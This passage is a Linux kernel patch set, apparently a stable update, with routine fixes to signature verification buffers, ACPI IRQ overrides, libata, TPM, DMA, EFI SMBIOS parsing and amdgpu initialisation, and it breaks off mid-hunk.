+diff --git a/crypto/asymmetric_keys/public_key.c b/crypto/asymmetric_keys/public_key.c
+index eca5671ad3f22..50c933f86b218 100644
+--- a/crypto/asymmetric_keys/public_key.c
++++ b/crypto/asymmetric_keys/public_key.c
+@@ -380,9 +380,10 @@ int public_key_verify_signature(const struct public_key *pkey,
+ 	struct crypto_wait cwait;
+ 	struct crypto_akcipher *tfm;
+ 	struct akcipher_request *req;
+-	struct scatterlist src_sg[2];
++	struct scatterlist src_sg;
+ 	char alg_name[CRYPTO_MAX_ALG_NAME];
+-	char *key, *ptr;
++	char *buf, *ptr;
++	size_t buf_len;
+ 	int ret;
+ 
+ 	pr_devel("==>%s()\n", __func__);
+@@ -420,34 +421,37 @@ int public_key_verify_signature(const struct public_key *pkey,
+ 	if (!req)
+ 		goto error_free_tfm;
+ 
+-	key = kmalloc(pkey->keylen + sizeof(u32) * 2 + pkey->paramlen,
+-		      GFP_KERNEL);
+-	if (!key)
++	buf_len = max_t(size_t, pkey->keylen + sizeof(u32) * 2 + pkey->paramlen,
++			sig->s_size + sig->digest_size);
++
++	buf = kmalloc(buf_len, GFP_KERNEL);
++	if (!buf)
+ 		goto error_free_req;
+ 
+-	memcpy(key, pkey->key, pkey->keylen);
+-	ptr = key + pkey->keylen;
++	memcpy(buf, pkey->key, pkey->keylen);
++	ptr = buf + pkey->keylen;
+ 	ptr = pkey_pack_u32(ptr, pkey->algo);
+ 	ptr = pkey_pack_u32(ptr, pkey->paramlen);
+ 	memcpy(ptr, pkey->params, pkey->paramlen);
+ 
+ 	if (pkey->key_is_private)
+-		ret = crypto_akcipher_set_priv_key(tfm, key, pkey->keylen);
++		ret = crypto_akcipher_set_priv_key(tfm, buf, pkey->keylen);
+ 	else
+-		ret = crypto_akcipher_set_pub_key(tfm, key, pkey->keylen);
++		ret = crypto_akcipher_set_pub_key(tfm, buf, pkey->keylen);
+ 	if (ret)
+-		goto error_free_key;
++		goto error_free_buf;
+ 
+ 	if (strcmp(pkey->pkey_algo, "sm2") == 0 && sig->data_size) {
+ 		ret = cert_sig_digest_update(sig, tfm);
+ 		if (ret)
+-			goto error_free_key;
++			goto error_free_buf;
+ 	}
+ 
+-	sg_init_table(src_sg, 2);
+-	sg_set_buf(&src_sg[0], sig->s, sig->s_size);
+-	sg_set_buf(&src_sg[1], sig->digest, sig->digest_size);
+-	akcipher_request_set_crypt(req, src_sg, NULL, sig->s_size,
++	memcpy(buf, sig->s, sig->s_size);
++	memcpy(buf + sig->s_size, sig->digest, sig->digest_size);
++
++	sg_init_one(&src_sg, buf, sig->s_size + sig->digest_size);
++	akcipher_request_set_crypt(req, &src_sg, NULL, sig->s_size,
+ 				   sig->digest_size);
+ 	crypto_init_wait(&cwait);
+ 	akcipher_request_set_callback(req, CRYPTO_TFM_REQ_MAY_BACKLOG |
+@@ -455,8 +459,8 @@ int public_key_verify_signature(const struct public_key *pkey,
+ 				      crypto_req_done, &cwait);
+ 	ret = crypto_wait_req(crypto_akcipher_verify(req), &cwait);
+ 
+-error_free_key:
+-	kfree(key);
++error_free_buf:
++	kfree(buf);
+ error_free_req:
+ 	akcipher_request_free(req);
+ error_free_tfm:
+diff --git a/drivers/acpi/resource.c b/drivers/acpi/resource.c
+index d08818baea88f..a7f12bdbc5e25 100644
+--- a/drivers/acpi/resource.c
++++ b/drivers/acpi/resource.c
+@@ -502,6 +502,17 @@ static const struct dmi_system_id maingear_laptop[] = {
+ 	{ }
+ };
+ 
++static const struct dmi_system_id lg_laptop[] = {
++	{
++		.ident = "LG Electronics 17U70P",
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "LG Electronics"),
++			DMI_MATCH(DMI_BOARD_NAME, "17U70P"),
++		},
++	},
++	{ }
++};
++
+ struct irq_override_cmp {
+ 	const struct dmi_system_id *system;
+ 	unsigned char irq;
+@@ -518,6 +529,7 @@ static const struct irq_override_cmp override_table[] = {
+ 	{ lenovo_laptop, 10, ACPI_LEVEL_SENSITIVE, ACPI_ACTIVE_LOW, 0, true },
+ 	{ tongfang_gm_rg, 1, ACPI_EDGE_SENSITIVE, ACPI_ACTIVE_LOW, 1, true },
+ 	{ maingear_laptop, 1, ACPI_EDGE_SENSITIVE, ACPI_ACTIVE_LOW, 1, true },
++	{ lg_laptop, 1, ACPI_LEVEL_SENSITIVE, ACPI_ACTIVE_LOW, 0, false },
+ };
+ 
+ static bool acpi_dev_irq_override(u32 gsi, u8 triggering, u8 polarity,
+diff --git a/drivers/ata/libata-scsi.c b/drivers/ata/libata-scsi.c
+index 06a3d95ed8f9f..39e1ff9b686b9 100644
+--- a/drivers/ata/libata-scsi.c
++++ b/drivers/ata/libata-scsi.c
+@@ -2699,18 +2699,36 @@ static unsigned int atapi_xlat(struct ata_queued_cmd *qc)
+ 	return 0;
+ }
+ 
+-static struct ata_device *ata_find_dev(struct ata_port *ap, int devno)
++static struct ata_device *ata_find_dev(struct ata_port *ap, unsigned int devno)
+ {
+-	if (!sata_pmp_attached(ap)) {
+-		if (likely(devno >= 0 &&
+-			   devno < ata_link_max_devices(&ap->link)))
++	/*
++	 * For the non-PMP case, ata_link_max_devices() returns 1 (SATA case),
++	 * or 2 (IDE master + slave case). However, the former case includes
++	 * libsas hosted devices which are numbered per scsi host, leading
++	 * to devno potentially being larger than 0 but with each struct
++	 * ata_device having its own struct ata_port and struct ata_link.
++	 * To accommodate these, ignore devno and always use device number 0.
++	 */
++	if (likely(!sata_pmp_attached(ap))) {
++		int link_max_devices = ata_link_max_devices(&ap->link);
++
++		if (link_max_devices == 1)
++			return &ap->link.device[0];
++
++		if (devno < link_max_devices)
+ 			return &ap->link.device[devno];
+-	} else {
+-		if (likely(devno >= 0 &&
+-			   devno < ap->nr_pmp_links))
+-			return &ap->pmp_link[devno].device[0];
++
++		return NULL;
+ 	}
+ 
++	/*
++	 * For PMP-attached devices, the device number corresponds to C
++	 * (channel) of SCSI [H:C:I:L], indicating the port pmp link
++	 * for the device.
++	 */
++	if (devno < ap->nr_pmp_links)
++		return &ap->pmp_link[devno].device[0];
++
+ 	return NULL;
+ }
+ 
+diff --git a/drivers/base/cacheinfo.c b/drivers/base/cacheinfo.c
+index c440d1af197a4..26e13887aba46 100644
+--- a/drivers/base/cacheinfo.c
++++ b/drivers/base/cacheinfo.c
+@@ -280,6 +280,16 @@ static int cache_shared_cpu_map_setup(unsigned int cpu)
+ 				continue;/* skip if itself or no cacheinfo */
+ 			for (sib_index = 0; sib_index < cache_leaves(i); sib_index++) {
+ 				sib_leaf = per_cpu_cacheinfo_idx(i, sib_index);
++
++				/*
++				 * Comparing cache IDs only makes sense if the leaves
++				 * belong to the same cache level of same type. Skip
++				 * the check if level and type do not match.
++				 */
++				if (sib_leaf->level != this_leaf->level ||
++				    sib_leaf->type != this_leaf->type)
++					continue;
++
+ 				if (cache_leaves_are_shared(this_leaf, sib_leaf)) {
+ 					cpumask_set_cpu(cpu, &sib_leaf->shared_cpu_map);
+ 					cpumask_set_cpu(i, &this_leaf->shared_cpu_map);
+@@ -311,6 +321,16 @@ static void cache_shared_cpu_map_remove(unsigned int cpu)
+ 
+ 			for (sib_index = 0; sib_index < cache_leaves(sibling); sib_index++) {
+ 				sib_leaf = per_cpu_cacheinfo_idx(sibling, sib_index);
++
++				/*
++				 * Comparing cache IDs only makes sense if the leaves
++				 * belong to the same cache level of same type. Skip
++				 * the check if level and type do not match.
++				 */
++				if (sib_leaf->level != this_leaf->level ||
++				    sib_leaf->type != this_leaf->type)
++					continue;
++
+ 				if (cache_leaves_are_shared(this_leaf, sib_leaf)) {
+ 					cpumask_clear_cpu(cpu, &sib_leaf->shared_cpu_map);
+ 					cpumask_clear_cpu(sibling, &this_leaf->shared_cpu_map);
+diff --git a/drivers/base/regmap/regmap.c b/drivers/base/regmap/regmap.c
+index 7de1f27d0323d..8359164bff903 100644
+--- a/drivers/base/regmap/regmap.c
++++ b/drivers/base/regmap/regmap.c
+@@ -2064,6 +2064,8 @@ int _regmap_raw_write(struct regmap *map, unsigned int reg,
+ 	size_t val_count = val_len / val_bytes;
+ 	size_t chunk_count, chunk_bytes;
+ 	size_t chunk_regs = val_count;
++	size_t max_data = map->max_raw_write - map->format.reg_bytes -
++			map->format.pad_bytes;
+ 	int ret, i;
+ 
+ 	if (!val_count)
+@@ -2071,8 +2073,8 @@ int _regmap_raw_write(struct regmap *map, unsigned int reg,
+ 
+ 	if (map->use_single_write)
+ 		chunk_regs = 1;
+-	else if (map->max_raw_write && val_len > map->max_raw_write)
+-		chunk_regs = map->max_raw_write / val_bytes;
++	else if (map->max_raw_write && val_len > max_data)
++		chunk_regs = max_data / val_bytes;
+ 
+ 	chunk_count = val_count / chunk_regs;
+ 	chunk_bytes = chunk_regs * val_bytes;
+diff --git a/drivers/block/nbd.c b/drivers/block/nbd.c
+index 888a6abb50f53..7718c81e1dba8 100644
+--- a/drivers/block/nbd.c
++++ b/drivers/block/nbd.c
+@@ -1665,7 +1665,7 @@ static int nbd_dev_dbg_init(struct nbd_device *nbd)
+ 		return -EIO;
+ 
+ 	dir = debugfs_create_dir(nbd_name(nbd), nbd_dbg_dir);
+-	if (!dir) {
++	if (IS_ERR(dir)) {
+ 		dev_err(nbd_to_dev(nbd), "Failed to create debugfs dir for '%s'\n",
+ 			nbd_name(nbd));
+ 		return -EIO;
+@@ -1691,7 +1691,7 @@ static int nbd_dbg_init(void)
+ 	struct dentry *dbg_dir;
+ 
+ 	dbg_dir = debugfs_create_dir("nbd", NULL);
+-	if (!dbg_dir)
++	if (IS_ERR(dbg_dir))
+ 		return -EIO;
+ 
+ 	nbd_dbg_dir = dbg_dir;
+diff --git a/drivers/block/rnbd/rnbd-proto.h b/drivers/block/rnbd/rnbd-proto.h
+index ea7ac8bca63cf..da1d0542d7e2c 100644
+--- a/drivers/block/rnbd/rnbd-proto.h
++++ b/drivers/block/rnbd/rnbd-proto.h
+@@ -241,7 +241,7 @@ static inline blk_opf_t rnbd_to_bio_flags(u32 rnbd_opf)
+ 		bio_opf = REQ_OP_WRITE;
+ 		break;
+ 	case RNBD_OP_FLUSH:
+-		bio_opf = REQ_OP_FLUSH | REQ_PREFLUSH;
++		bio_opf = REQ_OP_WRITE | REQ_PREFLUSH;
+ 		break;
+ 	case RNBD_OP_DISCARD:
+ 		bio_opf = REQ_OP_DISCARD;
+diff --git a/drivers/block/ublk_drv.c b/drivers/block/ublk_drv.c
+index c0cbc5f3eb266..c56d1c6d8e58d 100644
+--- a/drivers/block/ublk_drv.c
++++ b/drivers/block/ublk_drv.c
+@@ -1045,6 +1045,11 @@ static inline bool ublk_queue_ready(struct ublk_queue *ubq)
+ 	return ubq->nr_io_ready == ubq->q_depth;
+ }
+ 
++static void ublk_cmd_cancel_cb(struct io_uring_cmd *cmd, unsigned issue_flags)
++{
++	io_uring_cmd_done(cmd, UBLK_IO_RES_ABORT, 0, issue_flags);
++}
++
+ static void ublk_cancel_queue(struct ublk_queue *ubq)
+ {
+ 	int i;
+@@ -1056,8 +1061,8 @@ static void ublk_cancel_queue(struct ublk_queue *ubq)
+ 		struct ublk_io *io = &ubq->ios[i];
+ 
+ 		if (io->flags & UBLK_IO_FLAG_ACTIVE)
+-			io_uring_cmd_done(io->cmd, UBLK_IO_RES_ABORT, 0,
+-						IO_URING_F_UNLOCKED);
++			io_uring_cmd_complete_in_task(io->cmd,
++						      ublk_cmd_cancel_cb);
+ 	}
+ 
+ 	/* all io commands are canceled */
+diff --git a/drivers/char/tpm/tpm_tis_core.c b/drivers/char/tpm/tpm_tis_core.c
+index f02b583005a53..e05d2b227de37 100644
+--- a/drivers/char/tpm/tpm_tis_core.c
++++ b/drivers/char/tpm/tpm_tis_core.c
+@@ -805,8 +805,11 @@ static int tpm_tis_probe_irq_single(struct tpm_chip *chip, u32 intmask,
+ 	int rc;
+ 	u32 int_status;
+ 
+-	if (devm_request_irq(chip->dev.parent, irq, tis_int_handler, flags,
+-			     dev_name(&chip->dev), chip) != 0) {
++
++	rc = devm_request_threaded_irq(chip->dev.parent, irq, NULL,
++				       tis_int_handler, IRQF_ONESHOT | flags,
++				       dev_name(&chip->dev), chip);
++	if (rc) {
+ 		dev_info(&chip->dev, "Unable to request irq: %d for probe\n",
+ 			 irq);
+ 		return -1;
+diff --git a/drivers/char/tpm/tpm_tis_core.h b/drivers/char/tpm/tpm_tis_core.h
+index e978f457fd4d4..610bfadb6acf1 100644
+--- a/drivers/char/tpm/tpm_tis_core.h
++++ b/drivers/char/tpm/tpm_tis_core.h
+@@ -84,10 +84,10 @@ enum tis_defaults {
+ #define ILB_REMAP_SIZE			0x100
+ 
+ enum tpm_tis_flags {
+-	TPM_TIS_ITPM_WORKAROUND		= BIT(0),
+-	TPM_TIS_INVALID_STATUS		= BIT(1),
+-	TPM_TIS_DEFAULT_CANCELLATION	= BIT(2),
+-	TPM_TIS_IRQ_TESTED		= BIT(3),
++	TPM_TIS_ITPM_WORKAROUND		= 0,
++	TPM_TIS_INVALID_STATUS		= 1,
++	TPM_TIS_DEFAULT_CANCELLATION	= 2,
++	TPM_TIS_IRQ_TESTED		= 3,
+ };
+ 
+ struct tpm_tis_data {
+diff --git a/drivers/dma/at_xdmac.c b/drivers/dma/at_xdmac.c
+index bfc8ae2143957..7919906b02e74 100644
+--- a/drivers/dma/at_xdmac.c
++++ b/drivers/dma/at_xdmac.c
+@@ -1026,6 +1026,8 @@ at_xdmac_prep_interleaved(struct dma_chan *chan,
+ 							NULL,
+ 							src_addr, dst_addr,
+ 							xt, xt->sgl);
++		if (!first)
++			return NULL;
+ 
+ 		/* Length of the block is (BLEN+1) microblocks. */
+ 		for (i = 0; i < xt->numf - 1; i++)
+@@ -1056,8 +1058,9 @@ at_xdmac_prep_interleaved(struct dma_chan *chan,
+ 							       src_addr, dst_addr,
+ 							       xt, chunk);
+ 			if (!desc) {
+-				list_splice_tail_init(&first->descs_list,
+-						      &atchan->free_descs_list);
++				if (first)
++					list_splice_tail_init(&first->descs_list,
++							      &atchan->free_descs_list);
+ 				return NULL;
+ 			}
+ 
+diff --git a/drivers/dma/pl330.c b/drivers/dma/pl330.c
+index 0d9257fbdfb0d..b4731fe6bbc14 100644
+--- a/drivers/dma/pl330.c
++++ b/drivers/dma/pl330.c
+@@ -1050,7 +1050,7 @@ static bool _trigger(struct pl330_thread *thrd)
+ 	return true;
+ }
+ 
+-static bool _start(struct pl330_thread *thrd)
++static bool pl330_start_thread(struct pl330_thread *thrd)
+ {
+ 	switch (_state(thrd)) {
+ 	case PL330_STATE_FAULT_COMPLETING:
+@@ -1702,7 +1702,7 @@ static int pl330_update(struct pl330_dmac *pl330)
+ 			thrd->req_running = -1;
+ 
+ 			/* Get going again ASAP */
+-			_start(thrd);
++			pl330_start_thread(thrd);
+ 
+ 			/* For now, just make a list of callbacks to be done */
+ 			list_add_tail(&descdone->rqd, &pl330->req_done);
+@@ -2089,7 +2089,7 @@ static void pl330_tasklet(struct tasklet_struct *t)
+ 	} else {
+ 		/* Make sure the PL330 Channel thread is active */
+ 		spin_lock(&pch->thread->dmac->lock);
+-		_start(pch->thread);
++		pl330_start_thread(pch->thread);
+ 		spin_unlock(&pch->thread->dmac->lock);
+ 	}
+ 
+@@ -2107,7 +2107,7 @@ static void pl330_tasklet(struct tasklet_struct *t)
+ 			if (power_down) {
+ 				pch->active = true;
+ 				spin_lock(&pch->thread->dmac->lock);
+-				_start(pch->thread);
++				pl330_start_thread(pch->thread);
+ 				spin_unlock(&pch->thread->dmac->lock);
+ 				power_down = false;
+ 			}
+diff --git a/drivers/firmware/efi/libstub/arm64-stub.c b/drivers/firmware/efi/libstub/arm64-stub.c
+index 42282c5c3fe6a..e2f90566b291a 100644
+--- a/drivers/firmware/efi/libstub/arm64-stub.c
++++ b/drivers/firmware/efi/libstub/arm64-stub.c
+@@ -17,20 +17,43 @@
+ 
+ static bool system_needs_vamap(void)
+ {
+-	const u8 *type1_family = efi_get_smbios_string(1, family);
++	const struct efi_smbios_type4_record *record;
++	const u32 __aligned(1) *socid;
++	const u8 *version;
+ 
+ 	/*
+ 	 * Ampere eMAG, Altra, and Altra Max machines crash in SetTime() if
+-	 * SetVirtualAddressMap() has not been called prior.
++	 * SetVirtualAddressMap() has not been called prior. Most Altra systems
++	 * can be identified by the SMCCC soc ID, which is conveniently exposed
++	 * via the type 4 SMBIOS records. Otherwise, test the processor version
++	 * field. eMAG systems all appear to have the processor version field
++	 * set to "eMAG".
+ 	 */
+-	if (!type1_family || (
+-	    strcmp(type1_family, "eMAG") &&
+-	    strcmp(type1_family, "Altra") &&
+-	    strcmp(type1_family, "Altra Max")))
++	record = (struct efi_smbios_type4_record *)efi_get_smbios_record(4);
++	if (!record)
+ 		return false;
+ 
+-	efi_warn("Working around broken SetVirtualAddressMap()\n");
+-	return true;
++	socid = (u32 *)record->processor_id;
++	switch (*socid & 0xffff000f) {
++		static char const altra[] = "Ampere(TM) Altra(TM) Processor";
++		static char const emag[] = "eMAG";
++
++	default:
++		version = efi_get_smbios_string(&record->header, 4,
++						processor_version);
++		if (!version || (strncmp(version, altra, sizeof(altra) - 1) &&
++				 strncmp(version, emag, sizeof(emag) - 1)))
++			break;
++
++		fallthrough;
++
++	case 0x0a160001:	// Altra
++	case 0x0a160002:	// Altra Max
++		efi_warn("Working around broken SetVirtualAddressMap()\n");
++		return true;
++	}
++
++	return false;
+ }
+ 
+ efi_status_t check_platform_features(void)
+diff --git a/drivers/firmware/efi/libstub/efistub.h b/drivers/firmware/efi/libstub/efistub.h
+index 900df67a20785..970e86e3aab05 100644
+--- a/drivers/firmware/efi/libstub/efistub.h
++++ b/drivers/firmware/efi/libstub/efistub.h
+@@ -983,6 +983,8 @@ struct efi_smbios_record {
+ 	u16	handle;
+ };
+ 
++const struct efi_smbios_record *efi_get_smbios_record(u8 type);
++
+ struct efi_smbios_type1_record {
+ 	struct efi_smbios_record	header;
+ 
+@@ -996,13 +998,46 @@ struct efi_smbios_type1_record {
+ 	u8				family;
+ };
+ 
+-#define efi_get_smbios_string(__type, __name) ({			\
++struct efi_smbios_type4_record {
++	struct efi_smbios_record	header;
++
++	u8				socket;
++	u8				processor_type;
++	u8				processor_family;
++	u8				processor_manufacturer;
++	u8				processor_id[8];
++	u8				processor_version;
++	u8				voltage;
++	u16				external_clock;
++	u16				max_speed;
++	u16				current_speed;
++	u8				status;
++	u8				processor_upgrade;
++	u16				l1_cache_handle;
++	u16				l2_cache_handle;
++	u16				l3_cache_handle;
++	u8				serial_number;
++	u8				asset_tag;
++	u8				part_number;
++	u8				core_count;
++	u8				enabled_core_count;
++	u8				thread_count;
++	u16				processor_characteristics;
++	u16				processor_family2;
++	u16				core_count2;
++	u16				enabled_core_count2;
++	u16				thread_count2;
++	u16				thread_enabled;
++};
++
++#define efi_get_smbios_string(__record, __type, __name) ({		\
+ 	int size = sizeof(struct efi_smbios_type ## __type ## _record);	\
+ 	int off = offsetof(struct efi_smbios_type ## __type ## _record,	\
+ 			   __name);					\
+-	__efi_get_smbios_string(__type, off, size);			\
++	__efi_get_smbios_string((__record), __type, off, size);		\
+ })
+ 
+-const u8 *__efi_get_smbios_string(u8 type, int offset, int recsize);
++const u8 *__efi_get_smbios_string(const struct efi_smbios_record *record,
++				  u8 type, int offset, int recsize);
+ 
+ #endif
+diff --git a/drivers/firmware/efi/libstub/smbios.c b/drivers/firmware/efi/libstub/smbios.c
+index aadb422b9637d..f9c159c28f461 100644
+--- a/drivers/firmware/efi/libstub/smbios.c
++++ b/drivers/firmware/efi/libstub/smbios.c
+@@ -22,19 +22,28 @@ struct efi_smbios_protocol {
+ 	u8 minor_version;
+ };
+ 
+-const u8 *__efi_get_smbios_string(u8 type, int offset, int recsize)
++const struct efi_smbios_record *efi_get_smbios_record(u8 type)
+ {
+ 	struct efi_smbios_record *record;
+ 	efi_smbios_protocol_t *smbios;
+ 	efi_status_t status;
+ 	u16 handle = 0xfffe;
+-	const u8 *strtable;
+ 
+ 	status = efi_bs_call(locate_protocol, &EFI_SMBIOS_PROTOCOL_GUID, NULL,
+ 			     (void **)&smbios) ?:
+ 		 efi_call_proto(smbios, get_next, &handle, &type, &record, NULL);
+ 	if (status != EFI_SUCCESS)
+ 		return NULL;
++	return record;
++}
++
++const u8 *__efi_get_smbios_string(const struct efi_smbios_record *record,
++				  u8 type, int offset, int recsize)
++{
++	const u8 *strtable;
++
++	if (!record)
++		return NULL;
+ 
+ 	strtable = (u8 *)record + record->length;
+ 	for (int i = 1; i < ((u8 *)record)[offset]; i++) {
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+index 011e4fbe27f10..ef0a94c70859b 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+@@ -2512,8 +2512,6 @@ static int amdgpu_device_ip_init(struct amdgpu_device *adev)
+ 	amdgpu_fru_get_product_info(adev);
+ 
+ init_failed:
+-	if (amdgpu_sriov_vf(adev))
+-		amdgpu_virt_release_full_gpu(adev, true);
+ 
+ 	return r;
+ }
+@@ -3557,6 +3555,7 @@ int amdgpu_device_init(struct amdgpu_device *adev,
+ 	int r, i;
+ 	bool px = false;
+ 	u32 max_MBps;
++	int tmp;
+ 
+ 	adev->shutdown = false;
+ 	adev->flags = flags;
+@@ -3735,6 +3734,12 @@ int amdgpu_device_init(struct amdgpu_device *adev,
+ 		adev->have_atomics_support = ((struct amd_sriov_msg_pf2vf_info *)
+ 			adev->virt.fw_reserve.p_pf2vf)->pcie_atomic_ops_support_flags ==
+ 			(PCI_EXP_DEVCAP2_ATOMIC_COMP32 | PCI_EXP_DEVCAP2_ATOMIC_COMP64);
++	/* APUs w/ gfx9 onwards doesn't reply on PCIe atomics, rather it is a
++	 * internal path natively support atomics, set have_atomics_support to true.
++	 */
++	else if ((adev->flags & AMD_IS_APU) &&
++		(adev->ip_versions[GC_HWIP][0] > IP_VERSION(9, 0, 0)))
++		adev->have_atomics_support = true;
+ 	else
+ 		adev->have_atomics_support =
+ 			!pci_enable_atomic_ops_to_root(adev->pdev,
+@@ -3778,7 +3783,13 @@ int amdgpu_device_init(struct amdgpu_device *adev,
+ 				}
+ 			}
+ 		} else {
++			tmp = amdgpu_reset_method;
++			/* It should do a default reset when loading or reloading the driver,
++			 * regardless of the module parameter reset_method.
++			 */
++			amdgpu_reset_method = AMD_RESET_METHOD_NONE;
+ 			r = amdgpu_asic_reset(adev);
++			amdgpu_reset_method = tmp;
+ 			if (r) {
+ 				dev_err(adev->dev, "asic reset on init failed\n");
+ 				goto failed;
+@@ -3838,18 +3849,6 @@ fence_driver_init:
+ 
+ 	r = amdgpu_device_ip_init(adev);
+ 	if (r) {
+-		/* failed in exclusive mode due to timeout */
+-		if (amdgpu_sriov_vf(adev) &&
+-		    !amdgpu_sriov_runtime(adev) &&
+-		    amdgpu_virt_mmio_blocked(adev) &&
+-		    !amdgpu_virt_wait_reset(adev)) {
+-			dev_err(adev->dev, "VF exclusive mode timeout\n");
+-			/* Don't send request since VF is inactive. */
+-			adev->virt.caps &= ~AMDGPU_SRIOV_CAPS_RUNTIME;
+-			adev->virt.ops = NULL;
+-			r = -EAGAIN;
+-			goto release_ras_con;
+-		}
+ 		dev_err(adev->dev, "amdgpu_device_ip_init failed\n");
+ 		amdgpu_vf_error_put(adev, AMDGIM_ERROR_VF_AMDGPU_INIT_FAIL, 0, 0);
+ 		goto release_ras_con;
+@@ -3921,8 +3920,10 @@ fence_driver_init:
+ 				   msecs_to_jiffies(AMDGPU_RESUME_MS));
+ 	}
+ 
+-	if (amdgpu_sriov_vf(adev))
++	if (amdgpu_sriov_vf(adev)) {
++		amdgpu_virt_release_full_gpu(adev, true);
+ 		flush_delayed_work(&adev->delayed_init_work);
++	}
+ 
+ 	r = sysfs_create_files(&adev->dev->kobj, amdgpu_dev_attributes);
+ 	if (r)
+@@ -3962,6 +3963,20 @@ fence_driver_init:
+ 	return 0;
+ 
+ release_ras_con:
++	if (amdgpu_sriov_vf(adev))
++		amdgpu_virt_release_full_gpu(adev, true);
++
++	/* failed in exclusive mode due to timeout */
++	if (amdgpu_sriov_vf(adev) &&
++		!amdgpu_sriov_runtime(adev) &&
++		amdgpu_virt_mmio_blocked(adev) &&
++		!amdgpu_virt_wait_reset(adev)) {
++		dev_err(adev->dev, "VF exclusive mode timeout\n");
++		/* Don't send request since VF is inactive. */
++		adev->virt.caps &= ~AMDGPU_SRIOV_CAPS_RUNTIME;
++		adev->virt.ops = NULL;
++		r = -EAGAIN;
++	}
+ 	amdgpu_release_ras_context(adev);
+ 
+ failed:
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_fence.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_fence.c
+index 3cc1929285fc0..ed6878d5b3ce3 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_fence.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_fence.c
+@@ -528,7 +528,8 @@ void amdgpu_fence_driver_hw_fini(struct amdgpu_device *adev)
+ 		if (r)
+ 			amdgpu_fence_driver_force_completion(ring);
+ 
+-		if (ring->fence_drv.irq_src)
++		if (!drm_dev_is_unplugged(adev_to_drm(adev)) &&
++		    ring->fence_drv.irq_src)
+ 			amdgpu_irq_put(adev, ring->fence_drv.irq_src,
+ 				       ring->fence_drv.irq_type);
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_gmc.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_gmc.c
+index 02a4c93673ce2..2bc791ed8830a 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_gmc.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_gmc.c
+@@ -526,6 +526,8 @@ void amdgpu_gmc_tmz_set(struct amdgpu_device *adev)
+ 	case IP_VERSION(9, 3, 0):
+ 	/* GC 10.3.7 */
+ 	case IP_VERSION(10, 3, 7):
++	/* GC 11.0.1 */
++	case IP_VERSION(11, 0, 1):
+ 		if (amdgpu_tmz == 0) {
+ 			adev->gmc.tmz_enabled = false;
+ 			dev_info(adev->dev,
+@@ -548,7 +550,6 @@ void amdgpu_gmc_tmz_set(struct amdgpu_device *adev)
+ 	case IP_VERSION(10, 3, 1):
+ 	/* YELLOW_CARP*/
+ 	case IP_VERSION(10, 3, 3):
+-	case IP_VERSION(11, 0, 1):
+ 	case IP_VERSION(11, 0, 4):
+ 		/* Don't enable it by default yet.
+ 		 */
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+index b46732cefe37c..8ab0dd799b3cb 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+@@ -2763,7 +2763,7 @@ static int dm_resume(void *handle)
+ 		 * this is the case when traversing through already created
+ 		 * MST connectors, should be skipped
+ 		 */
+-		if (aconnector->dc_link->type == dc_connection_mst_branch)
++		if (aconnector && aconnector->mst_port)
+ 			continue;
+ 
+ 		mutex_lock(&aconnector->hpd_lock);
+@@ -6492,7 +6492,7 @@ static int dm_encoder_helper_atomic_check(struct drm_encoder *encoder,
+ 	int clock, bpp = 0;
+ 	bool is_y420 = false;
+ 
+-	if (!aconnector->port || !aconnector->dc_sink)
++	if (!aconnector->port)
+ 		return 0;
+ 
+ 	mst_port = aconnector->port;
+diff --git a/drivers/gpu/drm/amd/pm/legacy-dpm/si_dpm.c b/drivers/gpu/drm/amd/pm/legacy-dpm/si_dpm.c
+index 49c398ec0aaf6..c89cfef7cafa1 100644
+--- a/drivers/gpu/drm/amd/pm/legacy-dpm/si_dpm.c
++++ b/drivers/gpu/drm/amd/pm/legacy-dpm/si_dpm.c
+@@ -6925,23 +6925,6 @@ static int si_dpm_enable(struct amdgpu_device *adev)
+ 	return 0;
+ }
+ 
+-static int si_set_temperature_range(struct amdgpu_device *adev)
+-{
+-	int ret;
+-
+-	ret = si_thermal_enable_alert(adev, false);
+-	if (ret)
+-		return ret;
+-	ret = si_thermal_set_temperature_range(adev, R600_TEMP_RANGE_MIN, R600_TEMP_RANGE_MAX);
+-	if (ret)
+-		return ret;
+-	ret = si_thermal_enable_alert(adev, true);
+-	if (ret)
+-		return ret;
+-
+-	return ret;
+-}
+-
+ static void si_dpm_disable(struct amdgpu_device *adev)
+ {
+ 	struct rv7xx_power_info *pi = rv770_get_pi(adev);
+@@ -7626,18 +7609,6 @@ static int si_dpm_process_interrupt(struct amdgpu_device *adev,
+ 
+ static int si_dpm_late_init(void *handle)
+ {
+-	int ret;
+-	struct amdgpu_device *adev = (struct amdgpu_device *)handle;
+-
+-	if (!adev->pm.dpm_enabled)
+-		return 0;
+-
+-	ret = si_set_temperature_range(adev);
+-	if (ret)
+-		return ret;
+-#if 0 //TODO ?
+-	si_dpm_powergate_uvd(adev, true);
+-#endif
+ 	return 0;
+ }
+ 
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu11/vangogh_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu11/vangogh_ppt.c
+index cb10c7e312646..1b731a9c92d93 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu11/vangogh_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu11/vangogh_ppt.c
+@@ -580,7 +580,7 @@ static int vangogh_print_legacy_clk_levels(struct smu_context *smu,
+ 	DpmClocks_t *clk_table = smu->smu_table.clocks_table;
+ 	SmuMetrics_legacy_t metrics;
+ 	struct smu_dpm_context *smu_dpm_ctx = &(smu->smu_dpm);
